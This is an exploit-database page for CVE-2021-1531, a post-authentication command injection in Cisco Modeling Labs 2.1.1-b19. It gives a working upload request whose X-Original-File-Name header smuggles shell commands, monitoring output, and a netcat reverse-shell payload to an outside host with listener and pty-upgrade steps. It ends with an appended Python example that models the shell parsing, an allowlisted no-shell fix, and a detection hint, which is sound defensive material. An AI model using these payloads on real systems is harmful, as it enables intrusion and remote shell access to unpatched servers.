0day.today - Biggest Exploit Database in the World.
Cisco Modeling Labs 2.1.1-b19 Remote Command Execution Exploit
Security Risk Critical
Cisco Modeling Labs 2.1.1-b19 Post-Auth RCE Vulnerability
CVE-2021-1531

=======
Details
=======

Authenticated command injection in the web portal via the X-Original-File-Name header. Tested with portal 'admin' user who does not have a system login or SSH access, but likely works for any user who can upload files in the portal.

=====
Repro
=====

-------
Request
-------

POST /api/v0/images/upload HTTP/1.1
Host: 10.10.10.118
X-Original-File-Name: test.rpm';id>/tmp/123'
Authorization: Bearer [jwt token]
Content-Length: 0

--------
Response
--------

HTTP/1.1 200 OK
Server: nginx/1.14.1
...

"Success"

----------------
Local monitoring
----------------

pid=5547 executed [/bin/sh -c /usr/local/bin/imagetool -stderrthreshold=INFO -multipart move '/var/local/virl2/nginx-temp-folder/0063443599' '/var/local/virl2/dropfolder/test.rpm';id>/tmp/123''; exit 0 ]
.....
pid=5555 executed [id ]

$ cat /tmp/123
uid=982(virl2) gid=980(virl2) groups=980(virl2),982(wireshark),986(libvirt) context=system_u:system_r:unconfined_service_t:s0

============
Exploitation
============

The netcat binary with -e support is installed on the system, which makes gaining a remote shell as the virl2 user easy for demo.

-------
Payload
-------

X-Original-File-Name: test.rpm';nc 10.1.1.101 5000 -e /bin/bash'

--------
Listener
--------

$ nc -l -p 5000
.....
*connection received from cml2*

/usr/libexec/platform-python -c 'import pty; pty.spawn("/bin/bash")'

*** VIRL2 network simulator monitor ***

CLI> uname -a
Linux cml2-controller.cml.lab 4.18.0-80.11.2.el8_0.x86_64 #1 SMP Tue Sep 24 11:32:19 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

CLI> pwd
/var/local/virl2

===
Fix
===

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cml-cmd-inject-N4VYeQXB

# 0day.today [2024-07-01] #
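
The Local monitoring output shows the X-Original-File-Name value concatenated inside single quotes into a string run by /bin/sh -c. The following is an added example, not code from the advisory or from Cisco: it rebuilds that string, lists the commands a POSIX shell would see for a benign name and for the Repro header value, and contrasts this with an allowlisted argv list meant to be executed without a shell. The function names and the allowlist pattern are assumptions.

```python
import re
import shlex

# Paths and flags are copied from the "Local monitoring" output on this page.
IMAGETOOL = "/usr/local/bin/imagetool"
DROPFOLDER = "/var/local/virl2/dropfolder"
TMP_UPLOAD = "/var/local/virl2/nginx-temp-folder/0063443599"
# Assumed allowlist for upload names (not taken from the product).
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")
CONTROL_OPERATORS = {";", "&", "&&", "|", "||"}


def shell_string(tmp_path, header_name):
    """Rebuild the string handed to /bin/sh -c, as shown in the monitoring output."""
    return (f"{IMAGETOOL} -stderrthreshold=INFO -multipart move "
            f"'{tmp_path}' '{DROPFOLDER}/{header_name}'; exit 0")


def commands_seen_by_shell(cmdline):
    """Tokenise like a POSIX shell; return the first word of every command."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, at_start = [], True
    for token in lexer:
        if token in CONTROL_OPERATORS:
            at_start = True
        elif at_start:
            commands.append(token)
            at_start = False
    return commands


def safe_argv(tmp_path, header_name):
    """Hardened form: allowlist the name, then exec an argv list with no shell."""
    if not SAFE_NAME.fullmatch(header_name):
        raise ValueError(f"rejected upload file name: {header_name!r}")
    return [IMAGETOOL, "-stderrthreshold=INFO", "-multipart", "move",
            tmp_path, f"{DROPFOLDER}/{header_name}"]


if __name__ == "__main__":
    benign = "test.rpm"
    from_repro = "test.rpm';id>/tmp/123'"   # header value from the Repro section
    for name in (benign, from_repro):
        print(commands_seen_by_shell(shell_string(TMP_UPLOAD, name)))
    print(safe_argv(TMP_UPLOAD, benign))
```

The same command-counting check can be run over process-execution logs: an imagetool move invocation under /bin/sh -c that yields any command other than imagetool and the trailing exit warrants investigation.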